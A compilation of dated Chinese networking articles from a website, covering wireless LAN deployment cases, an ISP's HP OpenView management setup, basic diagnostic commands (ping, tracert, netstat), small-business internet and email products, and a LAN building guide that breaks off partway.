    某税务分局大楼内已建成一条有线局域网，在分局大楼外有七个所需要通过无线局域网与大楼内的有线网相连。分局大楼外的七个所，至分局最远距离15km，最近3km，其中有两个所在一栋建筑物内已建成一个小有线局域网，各所一般拥有2至4台工作站。我们采用的无线局域网产品工作在2.4GHz至2.4835GHz频率范围内，它要求两个通信点的天线之间最好没有物体遮挡，但由于大楼处于繁华地带，因此选择一个楼层较高的所作为无线局域网的中心站点。在中心站点上接入一个无线接入点AP-10D，其它各所通过接入一个站适配器SA-40D与中心站点的AP-10D进行通信，分局大楼内的有线局域网则通过接入一个无线网桥WB-10D与中心站点AP-10D进行通信。这样各所与分局所有站点对无线局域网的访问均通过中心站点的控制来实现，它们共享中心站点AP-10D的3M带宽。

    方案二

    某集团公司各企业分布在不同的建筑物内办公，按常规设计必须专线连接，每月支付昂贵的月租费和维护费用，并且无法解决移动站点访问和存取公司网上信息。采用2.4GHz频段无线局域网产品，可以比较灵活地组成一体化企业网络，达到与专线相同的性能，并解决移动站点问题，且安装维护方便，不需交频率使用费。具体方法是使用无线接入点（AP）的桥接功能，一端与建筑物间天线相连，一端与有线网络Hub相连，这样把两栋大楼互相联接起来替代专线功能。周围移动站点通过无线接入点与公司有线网络互连，访问和存取公司信息。

  图2 无线局域网的具体实现

    方案三

    某医科大学校内设有一博士后流动站，在校外设有一个药厂，两地相距3km，计划通过无线网络建立一个视频会议系统，以便于两地进行会议和交流。具体的视频会议系统要求是，网络带宽要保证视频和音频的传输质量；两地的视频会议终端可以进行视频的相互切换；可以实行摄像机的异地控制，包括镜头的上下左右转动、聚焦和拉伸。

    图3 无线局域网组网方案

    视频会议系统采用VCON公司的基于IP的H.323视频会议系统，视频会议终端采用中文操作界面Meeting Point 4.0，无线局域网设备采用Breeze NET PRO.11系列产品。由于两地间有建筑物阻挡，因此在其中间的小区内找一栋楼作中继，在其上安装了一台AP-10D，通过两个外接定向天线分别对准博士后流动站和药厂的天线。博士后流动站和药厂则分别安装一台SA-10D，通过外接定向天线与AP-10D建立无线链路。

返回


系统管理护卫网络运营

《一键清理系统垃圾》

系统管理护卫网络运营

上海热线系统管理方案

     上海热线是我国成立较早、发展较成熟的ISP之一，目前拥有8万多拨号用户和数百个专线用户，其提供的服务包括：

1） WWW系统

内容涉及热线站点、行业指南、网络导航、在线服务、用户手册、网站结构、新闻政治、经济纵横、大众生活、休闲空间和科技教育等各个方面，支持WWW服务器的分布处理能力，实现了负载分担。

2） Email系统

系统能够满足15万Email用户的使用，能方便地扩容升级，支持LDAP、ESMTP、IMAP4、POP3、S/MIME等Internet开放协议标准。

3） 虚拟服务器及个性化服务

4） 搜索引擎

支持中文文本检索。

5）VPDN应用

6）“证券之星”

建立了包括安全设施、增值服务、用户管理和在线交易等在内的综合证券服务。

7）试验项目

正在开展Internet Phone业务试验和其他多媒体应用试验。

8）其他应用

能够提供News、Chat、BBS、FTP、AOD、窄带VOD和个人主页等服务。

上海热线的计算机网络系统由20多台服务器（实现WWW、Email、DNS、数据库和计费等功能）、近20台大型路由器/交换机和其他若干小型路由器/交换机组成。

图1 上海热线网络拓扑结构图

作为运营单位，保证网络系统的稳定、提供预告警并能及时排除故障是必不可少的能力。为了提高网络运行的维护管理能力，上海热线借助HP OpenView系统管理软件构筑了一套自己的系统管理机制。

一、网络系统结构

上海热线采用Packet Over SDH的技术组网，建立了以漕溪和沈家宅为核心的高速骨干网络，如图1所示。其核心节点之间通过Cisco高速交换路由器以SDH线路相连，区域节点与核心节点的交换路由器相连。

漕溪和沈家宅核心节点通过出口路由器，分别与上海长途电信局ChinaNet节点的区域层互连。采用Cisco以太网交换机为核心的局域网结构，通过两台交换机提供局域网内部的高速数据交换。

采用快速以太网为主的交换技术，通过划分不同的虚拟局域网（VLAN）实现数据的分流，针对不同的VLAN分别进行ACL（Access Control List）设置。

同时，为了保证用户管理和计费网段的安全，在用户管理和计费网段间设置防火墙进行信息过滤。

二、管理目标和实现方式

1. 管理目标

在实践中，上海热线操作管理中心总结出了网络管理所应担负的责任：

1) 网络管理是网络的灵魂，网络管理应能稳定地运行，应具有主、备份服务器；

2) 网络管理应能够对网络上所有设备进行管理，如配置、重新启动及监测设备状态等等；

3) 网络管理应能记录网络中任何可能影响网络性能的事件，并通过显性的方式通知机务人员；

4) 网络管理应提供统计功能，以考察网络和设备的性能；

5) 网络管理应帮助运营者更好更快地为使用者和客户提供信息服务，降低管理成本，提高客户的满意度。

2. 实现方式

HP OpenView是一个开放的、基于标准的系统，建立了从LAN到WAN各种计算机环境下的管理基础，提供了丰富的网络、系统、应用以及数据库管理解决方案，能够支持多厂商环境下集成的网络、系统、数据库及应用的管理。上海热线操作管理中心利用了HP OpenView的多个管理模块来实现对系统的全面管理。

上海热线采用HP OpenView Network Node Manager（NNM）来实现网络管理功能，NNM主要针对OSI七层模型中第三层以上进行管理，是当前网络和系统管理的基础和平台，NNM与第三方的管理应用集成在一起，可以形成综合的管理环境。

OpenView系列中的IT/Operations(IT/O)是集中的系统问题管理工具，能自动发现系统中出现的问题，提醒系统管理员注意，及时解决问题。通过客户化配置，IT/O可以监视管理员所定义的关键系统资源的使用情况。

IT/O可以给被监视的性能资源变量设置阈值，当所定义的变量超出阈值时，IT/O的智能Agent能够立即向指定的管理中心发出报警信息，同时在本地执行指定的命令程序。IT/O管理员可定义某些关键进程和服务，并对这些进程的状态进行监控。对于用户定义的各种日志文件，IT/O可进行监控和分析。当日志文件中出现用户指定的信息时，IT/O的智能Agent能够立即向指定的管理中心发出报警信息，同时在本地执行指定的命令程序。

HP OpenView IT/Administration（IT/A）为UNIX和PC环境提供了统一的系统管理，使用IT/A可以控制并配置大量的多机种系统。IT/A为在不同的平台上集中运行各种系统管理工作提供了单一直观的界面。它提供了：

1)用户和账号的管理；

2)可精确定义管理员责任；

3)中心策略的统一实施；

4)硬件及软件的库存管理。

HP的系统性能管理工具PerfView/MeasureWare可以监控非常广泛的性能测量指标，快速辨别并解决系统中现有的和潜在的性能问题，准确地发现系统瓶颈，帮助系统管理人员制订出正确的解决方案。

HP OpenView是一个开放的网络和系统管理的平台，可以集成许多来自其他合作伙伴的解决方案，例如Platinum公司管理数据库的DBVision、Cisco公司管理网络设备的CiscoWorks、3COM公司管理接入设备的Total Control Manager等。

在上述几个模块的基础上，上海热线利用HP OpenView IT服务管理器（ITSM）实现了对整体服务的管理。实际处理流程如下：

1)用户向服务台要求服务，或者IT/O向服务台报告故障；

2)服务台工作人员记录详细的服务请求或故障信息；

3)对于较简单的问题，工作人员直接给予解答，对于较复杂的问题，工作人员则将问题分发给相关的专家进行处理；

4)专家必须在一定的时间内给出相应的解决方法，或者提出临时的解决方案；

5)服务台工作人员负责将此解决方法通知相关的用户；

6)如果问题在短时间内较难解决，而只能提供临时的解决方法，则必须在回复用户后，让专家组继续找出引发问题的根本原因，并予以解决。

返回


详解测试IP地址的几个命令

《一键清理系统垃圾》

详解测试IP地址的几个命令

  如果你是一位网络管理员或者是一位普通的拨号用户，可能经常会遇到这样一种情形，那就是访问某一个网站时可能会花费好长时间，或者根本就无法访问需要的网站，这样我们许多宝贵的时间就消耗在等待上了。那我们有没有办法节省花在等待上的时间，最大限度地来提高上网的效率呢？答案当然是肯定的。我们知道之所以访问一个网站需要等待好长时间，那是因为用户的计算机与要访问的网站之间的线路可能出现了交通堵塞的不稳定情况甚至出现了故障，如果我们能事先知道线路的质量不太好的话，就可以做到有的放矢，回避这一不稳定的情况，等到线路状态完好后再去访问需要的网站。看到这儿，有些性急的用户马上就发问了：那你快说说如何才能知道线路质量的好坏呢？要看详情，请看下面的几个网络测试命令，了解和掌握它们将会有助于你更好地使用和维护网络：
1.Ping
适用环境：WIN95/98/2000/NT
使用格式：ping [-t] [-a] [-n count] [-l size]
参数介绍：
-t 让用户所在的主机不断向目标主机发送数据
-a 以IP地址格式来显示目标主机的网络地址
-n count 指定要ping多少次，具体次数由后面的count来指定
-l size 指定发送到目标主机的数据包的大小
主要功能：用来测试一帧数据从一台主机传输到另一台主机所需的时间，从而判断主响应时间。
详细介绍：
该命令主要是用来检查路由是否能够到达，由于该命令的包长非常小，所以在网上传递的速度非常快，可以快速地检测你要去的站点是否可达，一般你在去某一站点时可以先运行一下该命令看看该站点是否可达。如果执行Ping不成功，则可以预测故障出现在以下几个方面：网线是否连通，网络适配器配置是否正确，IP地址是否可用等；如果执行Ping成功而网络仍无法使用，那么问题很可能出在网络系统的软件配置方面，Ping成功只能保证当前主机与目的主机间存在一条连通的物理路径。它的使用格式是在命令提示符下键入：Ping　IP地址或主机名，执行结果显示响应时间，重复执行这个命令，你可以发现Ping报告的响应时间是不同的。具体的ping命令后还可跟好多参数，你可以键入ping后回车其中会有很详细的说明。
举例说明：
当我们要访问一个站点例如www.chinayancheng. net时，就可以利用Ping程序来测试目前连接该网站的速度如何。执行时首先在Windows 9x系统上，单击“开始”键并选择运行命令，接着在运行对话框中输入Ping和用户要测试的网址，例如ping www.chinayan- cheng.net，接着该程序就会向指定的Web网址的主服务器发送一个32字节的消息，然后，它将服务器的响应时间记录下来。Ping程序将会向用户显示4次测试的结果，如图1所示。响应时间低于300毫秒都可以认为是正常的，时间超过400毫秒则较慢。出现“请求暂停（Request time out）”信息意味着网址没有在1秒内响应，这表明服务器没有对Ping做出响应的配置或者网址反应极慢。如果你看到4个“请求暂停”信息，说明网址拒绝Ping请求。因为过多的Ping测试本身会产生瓶颈，因此，许多Web管理员不让服务器接受此测试。如果网址很忙或者出于其他原因运行速度很慢，如硬件动力不足，数据信道比较狭窄，过一段时间可以再试一次以确定网址是不是真的有故障。如果多次测试都存在问题，则可以认为是用户的主机和该网址站点没有联接上，用户应该及时与因特网服务商或网络管理员联系。
2.winipcfg
适用环境：WIN95/98/2000
使用格式：winipcfg [/?] [/all]
参数介绍：
/? 显示winipcfg的格式和参数的英文说明
/all 显示所有的有关IP地址的配置信息
主要功能：显示用户所在主机内部的IP协议的配置信息
详细介绍：
winipcfg程序采用windows窗口的形式来显示IP协议的具体配置信息，如果winipcfg命令后面不跟任何参数直接运行，程序将会在窗口中显示网络适配器的物理地址、主机的IP地址、子网掩码以及默认网关等，还可以查看主机的相关信息如：主机名、DNS服务器、节点类型等。其中网络适配器的物理地址在检测网络错误时非常有用。在命令提示符下键入winipcfg／？可获得winipcfg的使用帮助，键入winipcfg／all可获得IP配置的所有属性。
举例说明：
如果我们想很快地了解某一台主机的IP协议的具体配置情况，可以使用winipcfg命令来检测。其具体操作步骤如下：在“运行”对话框中，直接输入winipcfg命令，接着按一下回车键，我们就会看到一个如图2所示的界面。在该界面中，我们了解到目前笔者所在的计算机是用的3COM类型的网卡，网卡的物理地址是00-60-08-07-95-14，主机的IP地址是210.73.140.13，子网掩码是255.255.255.192，路由器的地址是210.73.140.1，如果用户想更加详细地了解该主机的其他IP协议配置信息，例如DNS服务器、DHCP服务器等方面的信息，可以直接单击该界面中的“详细信息”按钮。
3.tracert
适用环境：WIN95/98/2000/NT
使用格式：tracert [-d] [-h maximum_hops] [-j host_list] [-w timeout]
参数介绍：
-d 不解析目标主机的名字
-h maximum_hops 指定搜索到目标地址的最大跳跃数
-j host_list 按照主机列表中的地址释放源路由
-w timeout 指定超时时间间隔，程序默认的时间单位是毫秒
主要功能：判定数据包到达目的主机所经过的路径、显示数据包经过的中继节点清单和到达时间。
详细介绍：
这个应用程序主要用来显示数据包到达目的主机所经过的路径。该命令的使用格式是在DOS命令提示符下或者直接在运行对话框中键入如下命令：tracert 主机IP地址或主机名。执行结果返回数据包到达目的主机前所经历的中继站清单，并显示到达每个中继站的时间。该功能同ping命令类似，但它所看到的信息要比ping命令详细得多，它把你送出的到某一站点的请求包，所走的全部路由都告诉你，并且通过该路由的ip是多少，通过该ip的时延是多少。具体的tracert命令后还可跟好多参数，大家可以键入tracert后回车，其中会有很详细的说明。
举例说明：
要是大家想要了解自己的计算机与目标主机之间详细的传输路径信息，可以使用tracert命令来检测一下。其具体操作步骤如下：在“运行”对话框中，直接输入tracert www.chinayancheng.net命令，接着单击一下回车键，我们就会看到一个如图3所示的界面；当然大家也可以在MS-DOS方式下，输入tracert www.chinayancheng.net命令，同样也能看到图3所示的结果画面。在该画面中，我们可以很详细地跟踪连接到目标网站www.chinayancheng.net的路径信息，例如中途经过多少次信息中转，每次经过一个中转站时花费了多长时间，通过这些时间，我们可以很方便地查出用户主机与目标网站之间的线路到底是在什么地方出了故障等情况。如果我们在tracert命令后面加上一些参数，还可以检测到其他更详细的信息，例如使用参数－d，可以指定程序在跟踪主机的路径信息时，同时也解析目标主机的域名。
4.netstat
适用环境：WIN95/98/2000/NT
使用格式：netstat [-r] [-s] [-n] [-a]
参数介绍：
-r 显示本机路由标的内容
-s 显示每个协议的使用状态（包括TCP协议、UDP协议、IP协议）
-n 以数字表格形式显示地址和端口
-a 显示所有主机的端口号
主要功能：该命令可以使用户了解到自己的主机是怎样与因特网相连接的。
详细介绍：
netstat程序有助于我们了解网络的整体使用情况。它可以显示当前正在活动的网络连接的详细信息，例如显示网络连接、路由表和网络接口信息，可以让用户得知目前总共有哪些网络连接正在运行。我们可以使用netstat／？命令来查看一下该命令的使用格式以及详细的参数说明，该命令的使用格式是在DOS命令提示符下或者直接在运行对话框中键入如下命令：netstat［参数］，利用该程序提供的参数功能，我们可以了解该命令的其他功能信息，例如显示以太网的统计信息，显示所有协议的使用状态，这些协议包括TCP协议、UDP协议以及IP协议等，另外还可以选择特定的协议并查看其具体使用信息，还能显示所有主机的端口号以及当前主机的详细路由信息。
举例说明：
如果我们想要了解盐城市信息网络中心节点的出口地址、网关地址及主机地址等信息的话，可以使用netstat命令来查询。具体操作方法如下：在“运行”对话框中，直接输入netstat命令，接着单击一下回车键，我们就会看到一个如图4所示的界面；当然大家也可以在MS-DOS方式下，输入netstat命令。在图4的界面中，我们可以了解到用户所在的主机采用的协议类型、当前主机与远端相连主机的IP地址以及它们之间的连接状态等信息。


小企业INTERNET接入方案

《一键清理系统垃圾》

小企业INTERNET接入方案

       本方案专为员工人数为10-40*人左右的新兴企业而设计。这样的企业需要一台 NT服务器运行其应用软件，并提供基本的文件/打印服务。在现代的办公环境中，知识工作者基本都具有了使用Microsoft　Office的技能，个人的生产率有了大大的提高。但是在团队作战的竞争环境中，企业需要在员工之间加强协作，建立知识管理/业务运作和电子商务的基础设施，即比尔盖咨所称"数字神经系统"。因此，使用多任务的功能强大的Windows NT Server，是每个新兴企业最好的起步点。同时，Internet的作用越来越在企业中凸显出来，Intel InBusiness Internet Station能够提供局域网接入到Internet的功能， 使每个人共享Internet资源，因此成为每个新兴企业的必备利器。

    这样的企业需要10-40*个左右的网络接口连接PC机和NT服务器。我们推荐 Intel的 InBusiness Internet Station 56K网络设备, 由于Intel InBusiness Internet Station 56K路由器具有四个10Base-T网络接口和两个 POTS接口，可以将四台计算机联入网络（选用额外的网络设备，可以接入更多数量的设备），同时，通过内置56K Modem，配合外置接口的外置Modem，通过PSTN(公共电话网) 接入 Internet，实现企业网络上的用户共享
Internet 。

网络服务器：

    HP E200/E800/LC2000服务器专为10-40*人左右的新兴企业设计，它不但购买价格极低，而且从安装到设置都非常简单，能让您将主要精力集中于自己的业务，无需再为计算机系统而操心。在它上面运行MS NT Server 不但可以进行用户管理和文件共享，而且可以将日常应用软件如Office97安装到服务器上，在服务器上可以管理整个软件系统，作到一机多用，最大限度的减少用户的投资。

系统备份：

    使用HP 的DAT8i磁带机，可以提供4GB的本机存储容量和8GB的压缩存储容量，使用HP 的DAT24i磁带机，可以提供12GB的本机存储容量和24GB的压缩存储容量, 平均无故障工作时间长达300000小时，即使出现意外情况也能使您有备无患。同时，支持单键恢复（OBDR）

优点：

Internet接入部分：

减少用户投资
推荐公共电话网，用户使用和维护费用少-普通电话费用
实现共享方式访问Internet，只需一个Internet账号，一个可选外置Modem设备
安装简便，易于管理

备份部分：

完备的备份策略
实时备份
实现NOS系统备份和恢复，用户应用程序备份和恢复，数据库系统备份和恢复，用户数据备份和恢复
应用简便
磁带备份，价格便宜，容量大

拓扑图

基本配置

配置清单
Model Description Qty
HP E200
E200 P1205A 采用Pentium III 600MHz/133MHz系统总线和9.1GB SCSI硬盘驱动器 1
NOS Windows NT Server 1
Internet Station 56K (2) RJ-11 Phone ports; (1) 9-Pin Serial port; (4) 10Base-T Ethernet ports 1
HP DAT8i C1528K 内置8GB磁带机 1
Net Adapter HP NetServer 10/100TX PCI局域网适配器D5013B 1
HP E800
E800 D9404AE 800，采用Pentium lll 733MHz和9.1GB SCSI硬盘驱动器，HP SureStore DAT24i 1
NOS Windows NT Server 1
Internet Station 56K (2) RJ-11 Phone ports; (1) 9-Pin Serial port; (4) 10Base-T Ethernet ports 1
Net Adapter HP NetServer 10/100TX PCI局域网适配器D5013B 1
HP LC2000
LC2000 D8524APentium III 667MHz,前端总线为133MHz128MB PC-133MHz ECC SDRAM,具有内存清理功能，集成的双通道Ultra2 SCSI控制器，集成的10/100TX网卡，CD-ROM驱动器，软盘驱动器，热插拔电源和风扇，集成的惠普远程助理，HP TopTools for Server,及HP OpenView ManageX/Event Manager 1
HDD D6106A9.1GB热插拔Ultra2 SCSI硬盘驱动器（7,200rpm） 1
NOS Windows NT Server 1
Internet Station 56K (2) RJ-11 Phone ports; (1) 9-Pin Serial port; (4) 10Base-T Ethernet ports 1
DAT24i磁带机 HP SureStore DAT24i内置式DDS-3磁带机C1555D 1

方案二 方案说明

    本方案专为员工人数为10-40*人左右的新兴企业而设计。这样的企业需要一台 NT服务器运行其应用软件，并提供基本的文件/打印服务。在现代的办公环境中，知识工作者基本都具有了使用Microsoft Office的技能，个人的生产率有了大大的提高。但是在团队作战的竞争环境中，企业需要在员工之间加强协作，建立知识管理/业务运作和电子商务的基础设施，即比尔盖咨所称"数字神经系统"。因此，使用多任务的功能强大的Windows NT Server，是每个新兴企业最好的起步点。同时，Internet的作用越来越在企业中凸显出来，Intel InBusiness Internet Station能够提供局域网接入到Internet的功能， 使每个人共享Internet资源，因此成为每个新兴企业的必备利器。

    这样的企业需要10-40*个左右的网络接口连接PC机和NT服务器。我们推荐 Intel的 InBusiness Internet Station 56K网络设备, 由于Intel InBusiness Internet Station 56K路由器具有四个10Base-T网络接口和两个 POTS接口，可以将四台计算机联入网络（选用额外的网络设备，可以接入更多数量的设备），同时，通过内置56K Modem，配合外置接口的外置Modem，通过PSTN(公共电话网) 接入 Internet，实现企业网络上的用户共享Internet 。

网络服务器：

    HP E200/E800/LC2000服务器专为10-40*人左右的新兴企业设计，它不但购买价格极低，而且从安装到设置都非常简单，能让您将主要精力集中于自己的业务，无需再为计算机系统而操心。在它上面运行MS NT Server 不但可以进行用户管理和文件共享，而且可以将日常应用软件如Office97安装到服务器上，在服务器上可以管理整个软件系统，作到一机多用，最大限度的减少用户的投资。

系统备份：

    使用HP 的DAT8i磁带机，可以提供4GB的本机存储容量和8GB的压缩存储容量，使用HP 的DAT24i磁带机，可以提供12GB的本机存储容量和24GB的压缩存储容量, 平均无故障工作时间长达300000小时，即使出现意外情况也能使您有备无患。同时，支持单键恢复（OBDR）

优点：

Internet接入部分：

减少用户投资
推荐公共电话网，用户使用和维护费用少-普通电话费用
实现共享方式访问Internet，只需一个Internet账号，一个可选外置Modem设备
安装简便，易于管理

备份部分：

完备的备份策略
实时备份
实现NOS系统备份和恢复，用户应用程序备份和恢复，数据库系统备份和恢复，用户数据备份和恢复
应用简便
磁带备份，价格便宜，容量大

拓扑图

基本配置

配置清单 Model Description Qty
HP E200
E200 P1205A 采用Pentium III 600MHz/133MHz系统总线和9.1GB SCSI硬盘驱动器 1
NOS Windows NT Server 1
Internet Station 56K (2) RJ-11 Phone ports; (1) 9-Pin Serial port; (4) 10Base-T Ethernet ports 1
HP DAT8i C1528K 内置8GB磁带机 1
Net Adapter HP NetServer 10/100TX PCI局域网适配器D5013B 1
HP E800
E800 D9404AE 800，采用Pentium lll 733MHz和9.1GB SCSI硬盘驱动器，HP SureStore DAT24i 1
NOS Windows NT Server 1
Internet Station 56K (2) RJ-11 Phone ports; (1) 9-Pin Serial port; (4) 10Base-T Ethernet ports 1
Net Adapter HP NetServer 10/100TX PCI局域网适配器D5013B 1
HP LC2000
LC2000 D8524APentium III 667MHz,前端总线为133MHz128MB PC-133MHz ECC SDRAM,具有内存清理功能，集成的双通道Ultra2 SCSI控制器，集成的10/100TX网卡，CD-ROM驱动器，软盘驱动器，热插拔电源和风扇，集成的惠普远程助理，HP TopTools for Server,及HP OpenView ManageX/Event Manager 1
HDD D6106A9.1GB热插拔Ultra2 SCSI硬盘驱动器（7,200rpm） 1
NOS Windows NT Server 1
Internet Station 56K (2) RJ-11 Phone ports; (1) 9-Pin Serial port; (4) 10Base-T Ethernet ports 1
DAT24i磁带机 HP SureStore DAT24i内置式DDS-3磁带机C1555D 1

返回


小企业用小Email系统

《一键清理系统垃圾》

小企业用小Email系统

随着全球经济的信息化和网络化，电子邮件在企业中的地位日益突出。

传统方案的缺陷

中小企业由于受到规模和资金的限制，不可能像大型企业那样建立专门的IT部门并购买昂贵的邮件服务器和软件。所以中小企业只能采取一些变通的办法，例如在ISP处申请多个独立的电子邮件账号，给多个计算机配上Modem，通过拨号的方式来收发电子邮件。美国现有300万家小企业使用电子邮件，其中80％是通过上述孤立的账号手工拨号实现的。

但这样做有两个主要的缺陷，首先是资源重复建设。多个Modem、多个账号、多条电话线是一笔不小的开销。其次是这样构建的邮件系统过于简单，不能满足企业的一些特殊需求：如不能自动回复，当雇员外出后可能延误许多商机；而且企业的邮件地址不能很好的代表企业形象，没有企业自己的域名，不能给客户留下深刻的印象。在这种形式下，Email Station出现了。

Email Station恰倒好处

Intel公司的Email Station邮件服务器可以使中小企业花比较少的费用就能享受到专业邮件服务器的功能。它可以提供Internet和局域网内的Email功能，可自动收发邮件、提供以公司名为域名的多个邮件地址、还支持远程拨入，并且安装使用非常容易。

Email Station只有一个笔记本的厚度，带一个以太网端口和一个串行通讯口，可以接传统的模拟Modem或ISDN Modem，内置2GB的硬盘做邮件存储和缓冲，并且带有状态指示灯。Email Station支持SMTP和POP3标准邮件收发协议，能运行在ISP提供的静态或动态IP地址上。

在局域网中设置Email Station非常容易，只需在它的串口上接Modem，再到ISP处申请一个账号，然后用浏览器进行帐号设置，整个过程只需20分钟即可完成。

1.全自动收发邮件

Email Station可以自动上网收发邮件，减少了传统手工拨号方式消耗的时间和开销，在使用者看来，新邮件仿佛永远是直接出现在收件箱内，而不需要像从前那样首先建立与ISP的拨号连接后再收发邮件。Email Station还可以设置成定时收发邮件，能在特定的一天内的特定时间段完成收发邮件的功能，而且可以设置成每隔一分钟就自动上网取新邮件。

2.特征鲜明的多用户邮件名

Email Station拥有域名管理的功能，可以设置多达200个的邮件账号。企业可以申请一个象征企业形象的域名，在此基础上设置基于此域名的多个邮件账号。这样邮件接收者直接从Email地址上就可以立即知道是哪个公司的哪个具体人发送来的邮件。

3.自动回复邮件

当公司员工出差或外出度假时，怎样处理电子邮件一直是个很麻烦的问题，因为客户很有可能认为是公司办事效率低下或故意拖延，还有可能损失一些商业机会。Email Station充分考虑到了这一点，可以设置自动回复功能，告诉发信者收信人外出的情况，也可以设置成自动转发邮件，把重要邮件转发给另外的公司员工，以保持公司效率和信誉，与客户保持密切而快速的联系。

4.方便的邮件地址表

Email Station提供给局域网内的所有用户一个共享的邮件地址列表，企业可以把所有客户的Email地址存入地址表，当需要给客户发送新产品信息或价格信息时，所有员工都可以利用地址表通过自己的信箱方便地发出这些邮件。

5.支持远程拨入功能

Email Station对于移动用户或出差在外的员工提供了一项远程拨入功能。通过电话线拨入后可直接取得自己的邮件或发送邮件，和在局域网内部操作一样方便。这对于那些雇有兼职员工的小企业更显得有用。

返回


小型企业局域网构建指南

《一键清理系统垃圾》

小型企业局域网构建指南

    如果你是一个小型企业或小型事业单位的信息主管，如果你想构建一个小型局域网，你将从何入手呢？不要着急，等你看完这篇文章，你就可以做到心中有数了。

    构建小型局域网主要考虑以下四个方面的内容：
   （1）申请域名；（2）申请接入因特网的线路；（3）局域网布线；（4）服务器的安装及设置。

    下面我们就针对这四个方面分别进行较详细的说明：

    一、申请域名：

    首先替自己的单位想几个好的域名，并且按常规申请域名后缀，例如：公司可以申请com后缀或com.cn后缀，政府部门可以申请gov.cn后缀，科研机构可以申请ac.cn后缀，教育部门可以申请edu.cn后缀等等。
    你可以到http://www.cnnic.cn（中国互联网络信息中心）去申请.cn域名，同时他也代理国际域名申请。
    中国互联网络信息中心(CNNIC)是成立于1997年6月3日的非盈利管理与服务机构，行使国家互联网络信息中心的职责。中国科学院计算机网络信息中心承担CNNIC的运行和管理工作，CNNIC在业务上接受信息产业部领导，在行政上接受中国科学院领导。CNNIC工作委员会，对CNNIC的建设、运行和管理进行监督评定。
    CNNIC的主要任务有：
    注册服务：域名注册、IP地址分配、自治系统号分配等。
    目录数据库服务：建立全国最高层次的网络目录数据库；提供对联网用户、网络地址、域名、自治系统号等方面信息的查询服务。
    信息服务：进行中国Internet发展状况统计调查；提供有关中国互联网络的政策、法规以及其它Internet相关资料的查询服务等。
   网站访客流量认证：为了促进我国Internet信息服务行业的健康发展，倡导网站流量认证的标准，向各站点提供网站访客流量统计认证工作。
    认证培训：为了促进中国Internet的普及与发展，通过设立适应不同层次用户需要的多种课程，来向社会进行多种层次的Internet技术及应用培训。
    此外，CNNIC还承担与Internet有关的国家科研项目以及向社会提供Internet技术咨询和服务工作。
    CNNIC作为国家级的互联网络信息中心，代表我国各互联网络单位与国际互联网络信息中心(InterNIC)、亚太互联网络信息中心(APNIC)，及其它的互联网络信息中心进行业务联系。
    另外，注册国际域名或.cn域名，还有一个很好的地方，那就是中国万网（http://www.net.cn）。（创联万网国际信息技术（北京）有限公司）。
    创联万网国际信息技术（北京）有限公司专门从事向企业提供因特网平台建设和其它电子商务增值服务。公司主要业务包括域名注册、主机租用、网站策划、网站推广、电子商务等业务，创联公司推出的中国万网计划的实施推动国内中小企业因特网应用的发展，中国万网也已成为企业网站建设的首选品牌。
    创联公司成立于1996年4月，公司成立的宗旨就是推进因特网事业在中国的发展。
    1997年初，公司率先在中国推出虚拟主机服务，使企业不必花很多钱和配备专业技术人员就可以拥有自己的网站，开展在线服务。
    创联的高质量的服务赢得了广泛的承认。1998年初，创联同中国电信一道率先成为国际域名注册管理机构InterNIC的首席合作伙伴。InterNIC的统计资料显示，通过创联公司注册的国际域名数量列中国第一位。
    1998年底，创联公司推出了宏伟的"中国万网"计划，要在2000年底之前替中国企业建立1万个拥有独立域名的网站，为电子商务在中国的顺利开展打下坚实而牢固的基础。
    当然你也可以到一些较大的ICP或ISP那儿去进行域名的注册，总之，当你进行了必要的表格填写（在线或正常填写），就可以等着域名注册机构给你的回音，等域名注册机构给你确切的消息后，你的域名申请就成功了。以后可别忘了按年度交纳域名注册费（现在的域名管理费一般为：.cn每年300元，国际域名每年200元）。
    如果你发现你的比较有名的注册商标已被别人抢注了，你可以向域名注册机构提出申请，要求他返还与你的注册商标同名的域名。因为在《中国互联网络域名注册暂行管理办法》中有一条为："不得使用他人已在中国注册过的企业名称或者商标名称"。因此，在注册之前，最好仔细阅读CNNIC的《中国互联网络域名注册暂行管理办法》和《中国互联网络域名注册实施细则》，以免给自己和别人造成不必要的麻烦。

    二、申请接入因特网的线路：

    国家目前已批准的因特网接入单位有9家：中国电信、中国联通、中国吉通、中国教育网、中国科技网、中国网通、中国长城互联网、中国国际经济贸易互联网和中国移动通信集团互联网。而目前只有前5家有国际出口带宽，其中有两个（中国教育网、中国科技网）不能够进行商业运营。
    现阶段中国教育网的二级主干网结点和三级主干网结点都是通过DDN方式接入因特网，而中国科技网的二级主干网结点大部分是通过卫星天线接入因特网，吉通公司的金桥网也多是通过卫星天线接入因特网。因此在申请接入因特网的线路时，最好将各大网络在本地的联接情况先调查一番，对比价格及网络带宽，选择一个较合适的接入方式。
    对于小型单位，可以申请电信部门的ISDN、X.25、DDN等入网方式，主要视网络用户的多少及单位经济实力而定。
    对于大型单位，中国科技网的卫星入网不失为一种好的选择。建一个卫星天线接收站的总投资约为20万元，卫星天线接收站建成以后，可以实行包月制，对于64K的带宽，每月费用为1.3万元（128K的，每月费用为2.1万元），这样就可以无限制地使用网络资源。
    如果需要了解电信部门的有关信息，可以先到北京信息港（http://www.bta.net.cn）看一看，也可到各地的信息港进行查询，例如果你在湖南，不妨先到湖南信息港（http://www.hn.cninfo.net）和长沙信息港（http://www.cs.hn.cninfo.net）去逛一逛，里面就有信息业务资费大全，不妨仔细研究对比一番。
    如果需要了解中国科技网的有关信息，请到中国科技网网络运行中心（http://noc.cstnet.net.cn）查阅。
    如果需要了解中国教育网的有关信息，请到中国教育和科研计算机网（http://www.edu.cn）查阅。
    如果需要了解中国金桥网的有关信息，请到中国金桥网络信息中心（http://gbnic.gb.com.cn）查阅。
    确定好接入线路后，向相关部门申请，并购置必备的接入设备后，此步即告完成。此步完成后，你可获得相应的网络参数，例IP地址段、掩码等。

    三、局域网布线：

    我们假设这里只有一栋楼，共有五层，每层20个房间，现在要在这里建一个局域网，我们怎样进行这一栋楼里的局域网布线呢？

    首先考虑网络拓扑结构：

    局域网拓扑结构主要有星型、环型及混合型。拓扑结构的选择与网络用途、传输介质、访问控制方法紧密相关。星型拓扑由中央节点和通过点对点链路接到中央节点的各分节点组成,中央节点执行集中式通信控制策略,减轻各分节点之间的处理负担。星型网络与其他几种结构相比,具有如下优点:

    ·中央节点、集线器集中一处,方便提供服务和网络重新配置；
    ·网络中连接点往往容易产生故障,在星型拓扑中,单点失败只影响一个设备,不会导致全网崩溃；
    ·由于每个分节点直接到达中央节点,容易检测和隔离故障,可方便地将故障点从系统中删除；
    ·星型网中任何连接只涉及中央节点和分节点,因此控制介质访问的方法很简单。

